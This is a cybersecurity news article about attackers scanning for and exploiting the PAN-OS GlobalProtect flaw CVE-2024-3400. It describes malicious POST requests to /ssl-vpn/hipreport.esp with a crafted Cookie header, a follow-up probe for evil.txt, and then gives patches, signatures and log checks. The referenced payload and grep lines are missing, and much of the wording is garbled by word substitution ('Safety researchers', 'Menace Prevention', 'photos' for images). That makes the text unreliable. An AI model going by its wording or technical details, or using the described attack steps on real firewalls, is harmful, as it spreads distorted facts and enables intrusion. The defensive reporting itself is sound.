Safety researchers are observing a major enhance in internet-wide scans concentrating on the vital PAN-OS GlobalProtect vulnerability (CVE-2024-3400).
Exploit makes an attempt have surged as attackers search to leverage an arbitrary file creation flaw to realize OS command injection and finally full root code execution on weak firewalls.
Exploitation of Essential PAN-OS SSL VPN Flaw (CVE-2024-3400)
Since late September 2025, honeypots deployed globally have logged hundreds of TCP connections probing PAN-OS SSL VPN portals.
SANS Expertise Institute noticed that one distinguished supply IP, 141.98.82.26, has repeatedly issued malicious POST requests to the /ssl-vpn/hipreport.esp endpoint, exploiting the shortage of session ID validation. The attacker provides a crafted Cookie header:
If the add succeeds, a follow-up GET request for /global-protect/portal/photos/evil.txt will return HTTP/403, confirming file presence.
Attackers then pivot file placement to directories, permitting command execution. These automated scans mirror the excessive CVSS 10.0 severity and network-accessible, unauthenticated assault vector of CVE-2024-3400.
Threat FactorsDetailsAffected ProductsPAN-OS 10.2 variations earlier than 10.2.9-h1, 11.0 variations earlier than 11.0.4-h1, 11.1 variations earlier than 11.1.2-h3 (with GlobalProtect gateway or portal enabled)ImpactArbitrary file creation resulting in OS command injection and root code executionExploit PrerequisitesNone (network-accessible, unauthenticated)CVSS 3.1 Score10. 0 (Essential)
Mitigations
Palo Alto Networks has launched fastened PAN-OS variations—10.2.9-h1, 11.0.4-h1, 11.1.2-h3—and new hotfixes for affected branches.
A right away improve is strongly suggested to thwart ongoing exploitation. Directors can even deploy Menace Prevention signatures 95187, 95189, and 95191 to dam the preliminary arbitrary file creation interplay on the GlobalProtect interface.
For detection, operators ought to grep GPSvc logs for anomalous session ID strings:
Professional GUID patterns seem as hex-digit teams; any file-system path or shell snippet between classes ( and ) signifies exploitation makes an attempt.
A timeline of updates reveals that enhanced manufacturing unit reset (EFR) procedures and CLI instructions for proof assortment had been revealed between April and Could 2024, underscoring the continuing remediation efforts.
Cloud NGFW and Prisma Entry prospects usually are not affected; solely on-premises PAN-OS 10.2–11.1 gadgets with GlobalProtect gateway or portal enabled are in danger.
Organizations ought to confirm configuration by way of the firewall GUI below Community > GlobalProtect > Gateways/Portals and audit for unauthorized recordsdata in /var/appweb/sslvpndocs.
As menace actors proceed to weaponize CVE-2024-3400, vigilant patch administration, proactive log inspection, and strong Menace Prevention enforcement stay vital to defend towards unauthorized root-level entry.
Observe us on Google Information, LinkedIn, and X for each day cybersecurity updates. Contact us to characteristic your tales.
